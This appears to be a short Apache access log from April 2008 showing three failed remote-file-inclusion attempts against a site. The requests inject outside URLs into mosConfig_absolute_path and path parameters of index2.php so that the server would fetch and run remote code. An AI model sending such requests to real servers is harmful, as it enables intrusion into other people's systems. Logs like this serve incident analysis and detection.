208.1.62.200 - - [01/Apr/2008:10:05:49 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:10:05:50 -0700] "GET /index2.php?path=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:10:05:50 -0700] "GET /logs/index2.php?path=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
